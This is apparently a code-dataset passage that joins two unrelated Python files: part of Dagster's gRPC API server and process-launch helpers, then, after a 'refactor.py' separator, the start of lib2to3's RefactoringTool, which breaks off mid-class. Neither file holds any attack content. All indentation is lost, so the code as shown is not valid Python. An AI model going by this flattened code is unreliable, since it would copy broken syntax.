check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
recon_pipeline, execution_plan_args
)
return api_pb2.ExecutionPlanSnapshotReply(
serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
execution_plan_snapshot_or_error
)
)
def ListRepositories(self, request, _context):
try:
response = ListRepositoriesResponse(
self._repository_symbols_and_code_pointers.loadable_repository_symbols,
executable_path=self._loadable_target_origin.executable_path
if self._loadable_target_origin
else None,
repository_code_pointer_dict=(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name
),
)
except Exception: # pylint: disable=broad-except
response = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
)
def ExternalPartitionNames(self, request, _context):
partition_names_args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_names_args
)
check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
return api_pb2.ExternalPartitionNamesReply(
serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_names(
recon_repo,
partition_names_args.partition_set_name,
)
)
)
def ExternalPartitionSetExecutionParams(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_set_execution_param_args
)
check.inst_param(
args,
"args",
PartitionSetExecutionParamArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionSetExecutionParamsReply(
serialized_external_partition_set_execution_param_data_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_set_execution_param_data(
recon_repo=recon_repo,
partition_set_name=args.partition_set_name,
partition_names=args.partition_names,
)
)
)
def ExternalPartitionConfig(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(args, "args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionConfigReply(
serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
)
)
def ExternalPartitionTags(self, request, _context):
partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(partition_args, "partition_args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
return api_pb2.ExternalPartitionTagsReply(
serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_tags(
recon_repo, partition_args.partition_set_name, partition_args.partition_name
)
)
)
def ExternalPipelineSubsetSnapshot(self, request, _context):
pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
request.serialized_pipeline_subset_snapshot_args
)
check.inst_param(
pipeline_subset_snapshot_args,
"pipeline_subset_snapshot_args",
PipelineSubsetSnapshotArgs,
)
return api_pb2.ExternalPipelineSubsetSnapshotReply(
serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
get_external_pipeline_subset_result(
self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
pipeline_subset_snapshot_args.solid_selection,
)
)
)
def _get_serialized_external_repository_data(self, request):
repository_origin = deserialize_json_to_dagster_namedtuple(
request.serialized_repository_python_origin
)
check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
recon_repo = self._recon_repository_from_origin(repository_origin)
return serialize_dagster_namedtuple(
external_repository_data_from_def(recon_repo.get_definition())
)
def ExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
return api_pb2.ExternalRepositoryReply(
serialized_external_repository_data=serialized_external_repository_data,
)
def StreamingExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
num_chunks = int(
math.ceil(
float(len(serialized_external_repository_data))
/ STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE
)
)
for i in range(num_chunks):
start_index = i * STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE,
len(serialized_external_repository_data),
)
yield api_pb2.StreamingExternalRepositoryEvent(
sequence_number=i,
serialized_external_repository_chunk=serialized_external_repository_data[
start_index:end_index
],
)
def ExternalScheduleExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_schedule_execution_args
)
check.inst_param(
args,
"args",
ExternalScheduleExecutionArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalScheduleExecutionReply(
serialized_external_schedule_execution_data_or_external_schedule_execution_error=serialize_dagster_namedtuple(
get_external_schedule_execution(
recon_repo,
args.instance_ref,
args.schedule_name,
args.scheduled_execution_timestamp,
args.scheduled_execution_timezone,
)
)
)
def ExternalSensorExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_sensor_execution_args
)
check.inst_param(args, "args", SensorExecutionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalSensorExecutionReply(
serialized_external_sensor_execution_data_or_external_sensor_execution_error=serialize_dagster_namedtuple(
get_external_sensor_execution(
recon_repo,
args.instance_ref,
args.sensor_name,
args.last_completion_time,
args.last_run_key,
)
)
)
def ShutdownServer(self, request, _context):
try:
self._shutdown_once_executions_finish_event.set()
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(success=True, serializable_error_info=None)
)
)
except: # pylint: disable=bare-except
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(
success=False,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
def CancelExecution(self, request, _context):
success = False
message = None
serializable_error_info = None
try:
cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
CancelExecutionRequest,
)
with self._execution_lock:
if cancel_execution_request.run_id in self._executions:
self._termination_events[cancel_execution_request.run_id].set()
self._termination_times[cancel_execution_request.run_id] = time.time()
success = True
except: # pylint: disable=bare-except
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.CancelExecutionReply(
serialized_cancel_execution_result=serialize_dagster_namedtuple(
CancelExecutionResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def CanCancelExecution(self, request, _context):
can_cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
CanCancelExecutionRequest,
)
with self._execution_lock:
run_id = can_cancel_execution_request.run_id
can_cancel = (
run_id in self._executions and not self._termination_events[run_id].is_set()
)
return api_pb2.CanCancelExecutionReply(
serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
CanCancelExecutionResult(can_cancel=can_cancel)
)
)
def StartRun(self, request, _context):
if self._shutdown_once_executions_finish_event.is_set():
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message="Tried to start a run on a server after telling it to shut down",
serializable_error_info=None,
)
)
)
try:
execute_run_args = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
ExecuteExternalPipelineArgs,
)
run_id = execute_run_args.pipeline_run_id
recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
except: # pylint: disable=bare-except
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message=None,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
event_queue = multiprocessing.Queue()
termination_event = multiprocessing.Event()
execution_process = multiprocessing.Process(
target=start_run_in_subprocess,
args=[
request.serialized_execute_run_args,
recon_pipeline,
event_queue,
termination_event,
],
)
with self._execution_lock:
execution_process.start()
self._executions[run_id] = (
execution_process,
execute_run_args.instance_ref,
)
self._termination_events[run_id] = termination_event
success = None
message = None
serializable_error_info = None
while success is None:
time.sleep(EVENT_QUEUE_POLL_INTERVAL)
# We use `get_nowait()` instead of `get()` so that we can handle the case where the
# execution process has died unexpectedly -- `get()` would hang forever in that case
try:
dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
except queue.Empty:
if not execution_process.is_alive():
# subprocess died unexpectedly
success = False
message = (
"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
"exit code {exit_code}".format(
run_id=run_id,
exit_code=execution_process.exitcode,
)
)
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
else:
if isinstance(
dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
):
success = True
elif isinstance(
dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
):
continue
if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
success = False
message = dagster_event_or_ipc_error_message_or_done.message
serializable_error_info = (
dagster_event_or_ipc_error_message_or_done.serializable_error_info
)
# Ensure that if the run failed, we remove it from the executions map before
# returning so that CanCancel will never return True
if not success:
with self._execution_lock:
self._clear_run(run_id)
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def _get_current_image(self):
return os.getenv("DAGSTER_CURRENT_IMAGE")
def GetCurrentImage(self, request, _context):
return api_pb2.GetCurrentImageReply(
serialized_current_image=serialize_dagster_namedtuple(
GetCurrentImageResult(
current_image=self._get_current_image(), serializable_error_info=None
)
)
)
@whitelist_for_serdes
class GrpcServerStartedEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerLoadErrorEvent(namedtuple("GrpcServerLoadErrorEvent", "error_info")):
def __new__(cls, error_info):
return super(GrpcServerLoadErrorEvent, cls).__new__(
cls,
check.inst_param(error_info, "error_info", SerializableErrorInfo),
)
def server_termination_target(termination_event, server):
termination_event.wait()
# We could make this grace period configurable if we set it in the ShutdownServer handler
server.stop(grace=5)
class DagsterGrpcServer:
def __init__(
self,
host="localhost",
port=None,
socket=None,
max_workers=None,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
ipc_output_file=None,
fixed_server_id=None,
):
check.opt_str_param(host, "host")
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.opt_int_param(max_workers, "max_workers")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.invariant(
port is not None if seven.IS_WINDOWS else True,
"You must pass a valid `port` on Windows: `socket` not supported.",
)
check.invariant(
(port or socket) and not (port and socket),
"You must pass one and only one of `port` or `socket`.",
)
check.invariant(
host is not None if port else True,
"Must provide a host when serving on a port",
)
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
self.server = grpc.server(ThreadPoolExecutor(max_workers=max_workers))
self._server_termination_event = threading.Event()
try:
self._api_servicer = DagsterApiServer(
server_termination_event=self._server_termination_event,
loadable_target_origin=loadable_target_origin,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
except Exception:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(
GrpcServerLoadErrorEvent(
error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
raise
# Create a health check servicer
self._health_servicer = health.HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
add_DagsterApiServicer_to_server(self._api_servicer, self.server)
if port:
server_address = host + ":" + str(port)
else:
server_address = "unix:" + os.path.abspath(socket)
# grpc.Server.add_insecure_port returns:
# - 0 on failure
# - port number when a port is successfully bound
# - 1 when a UDS is successfully bound
res = self.server.add_insecure_port(server_address)
if socket and res != 1:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(socket)
if port and res != port:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(port)
def serve(self):
# Unfortunately it looks like ports bind late (here) and so this can fail with an error
# from C++ like:
#
# E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
# {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
# 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
# "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
# "Unable to configure socket","fd":6,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
# "referenced_errors":[{"created":"@1593089216.180079000",
# "description":"Address already in use","errno":48,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
# "Address already in use","syscall":"bind"}]}]}
#
# This is printed to stdout and there is no return value from server.start or exception
# raised in Python that we can use to handle this. The standard recipes for hijacking C
# stdout (so we could inspect this output and respond accordingly), e.g.
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
# to work (at least on Mac OS X) against grpc, and in any case would involve a huge
# cross-version and cross-platform maintenance burden. We have an issue open against grpc,
# https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
self.server.start()
# Note: currently this is hardcoded as serving, since both services are cohosted
# pylint: disable=no-member
self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerStartedEvent())
server_termination_thread = threading.Thread(
target=server_termination_target,
args=[self._server_termination_event, self.server],
name="grpc-server-termination",
)
server_termination_thread.daemon = True
server_termination_thread.start()
self.server.wait_for_termination()
server_termination_thread.join()
self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
def __init__(self, port=None, socket=None):
super(CouldNotStartServerProcess, self).__init__(
"Could not start server with "
+ (
"port {port}".format(port=port)
if port is not None
else "socket {socket}".format(socket=socket)
)
)
def wait_for_grpc_server(server_process, ipc_output_file, timeout=15):
event = read_unary_response(ipc_output_file, timeout=timeout, ipc_process=server_process)
if isinstance(event, GrpcServerFailedToBindEvent):
raise CouldNotBindGrpcServerToAddress()
elif isinstance(event, GrpcServerLoadErrorEvent):
raise DagsterUserCodeProcessError(
event.error_info.to_string(), user_code_process_error_infos=[event.error_info]
)
elif isinstance(event, GrpcServerStartedEvent):
return True
else:
raise Exception(
"Received unexpected IPC event from gRPC Server: {event}".format(event=event)
)
def open_server_process(
port,
socket,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
check.invariant((port or socket) and not (port and socket), "Set only port or socket")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.opt_int_param(max_workers, "max_workers")
from dagster.core.test_utils import get_mocked_system_timezone
with tempfile.TemporaryDirectory() as temp_dir:
output_file = os.path.join(
temp_dir, "grpc-server-startup-{uuid}".format(uuid=uuid.uuid4().hex)
)
mocked_system_timezone = get_mocked_system_timezone()
subprocess_args = (
[
loadable_target_origin.executable_path
if loadable_target_origin and loadable_target_origin.executable_path
else sys.executable,
"-m",
"dagster.grpc",
]
+ (["--port", str(port)] if port else [])
+ (["--socket", socket] if socket else [])
+ (["-n", str(max_workers)] if max_workers else [])
+ (["--heartbeat"] if heartbeat else [])
+ (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
+ (["--lazy-load-user-code"] if lazy_load_user_code else [])
+ (["--ipc-output-file", output_file])
+ (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
+ (
["--override-system-timezone", mocked_system_timezone]
if mocked_system_timezone
else []
)
)
if loadable_target_origin:
subprocess_args += loadable_target_origin.get_cli_args()
server_process = open_ipc_subprocess(subprocess_args)
try:
wait_for_grpc_server(server_process, output_file)
except:
if server_process.poll() is None:
server_process.terminate()
raise
return server_process
def open_server_process_on_dynamic_port(
max_retries=10,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
server_process = None
retries = 0
while server_process is None and retries < max_retries:
port = find_free_port()
try:
server_process = open_server_process(
port=port,
socket=None,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
except CouldNotBindGrpcServerToAddress:
pass
retries += 1
return server_process, port
class GrpcServerProcess:
def __init__(
self,
loadable_target_origin=None,
force_port=False,
max_retries=10,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
self.port = None
self.socket = None
self.server_process = None
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.bool_param(force_port, "force_port")
check.int_param(max_retries, "max_retries")
check.opt_int_param(max_workers, "max_workers")
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.bool_param(lazy_load_user_code, "lazy_load_user_code")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
if seven.IS_WINDOWS or force_port:
self.server_process, self.port = open_server_process_on_dynamic_port(
max_retries=max_retries,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
else:
self.socket = safe_tempfile_path_unmanaged()
self.server_process = open_server_process(
port=None,
socket=self.socket,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
if self.server_process is None:
raise CouldNotStartServerProcess(port=self.port, socket=self.socket)
@property
def pid(self):
return self.server_process.pid
def wait(self, timeout=30):
if self.server_process.poll() is None:
seven.wait_for_process(self.server_process, timeout=timeout)
def create_ephemeral_client(self):
from dagster.grpc.client import EphemeralDagsterGrpcClient
return EphemeralDagsterGrpcClient(
port=self.port, socket=self.socket, server_process=self.server_process
)
|
refactor.py
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import io
import os
import pkgutil
import sys
import logging
import operator
import collections
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fix_names = []
for finder, name, ispkg in pkgutil.iter_modules(pkg.__path__):
if name.startswith("fix_"):
if remove_prefix:
name = name[4:]
fix_names.append(name)
return fix_names
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
# NodePatters must either have no type and no content
# or a type and content -- so they don't get any farther
# Always return leafs
if pat.type is None:
raise _EveryNode
return {pat.type}
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(pygram.python_grammar.symbol2number.values(),
pygram.python_grammar.tokens):
head_nodes[node_type].extend(every)
return dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [pkg_name + "." + fix_name
for fix_name in get_all_fix_names(pkg_name, False)]
def _identity(obj):
return obj
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset({token.NEWLINE, tokenize.NL, token.COMMENT})
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {"print_function" : False,
"exec_function": False,
"write_unchanged_files" : False}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: a dict with configuration.
explicit: a list of fixers to run even if they are explicit.
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
self.grammar = pygram.python_grammar.copy()
if self.options['print_function']:
del self.grammar.keywords["print"]
elif self.options['exec_function']:
del self.grammar.keywords["exec"]
# When this is True, the refactor*() methods will call write_file() for
# files processed even if they were not changed during refactoring. If
# and only if the refactor method's write parameter was True.
self.write_unchanged_files = self.options.get("write_unchanged_files")
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(self.grammar,
convert=pytree.convert,
logger=self.logger)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX):]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name)) from None
fixer = fix_class(self.options, self.fixer_log)
if fixer.explicit and self.explicit is not True and \
fix_mod_path not in self.explicit:
self.log_message("Skipping optional fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if (not name.startswith(".") and
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except OSError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with io.open(filename, "r", encoding=encoding, newline='') as f:
return f.read(), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if self.write_unchanged_files or output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if self.write_unchanged_files or (tree and tree.was_changed):
# The [:-1] is to take off the \n we added earlier
self.processed_file(str(tree)[:-1], filename,
write=write, encoding=encoding)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if self.write_unchanged_files or output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if self.write_unchanged_files or (tree and tree.was_changed):
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
#use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
#sort by depth; apply fixers from bottom(of the AST) to top
match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
if fixer.keep_line_order:
#some fixers(eg fix_imports) must be applied
#with the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except ValueError:
# this node has been cut off from a
# previous transformation ; skip
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
#new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
if not fxr in match_set:
match_set[fxr]=[]
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
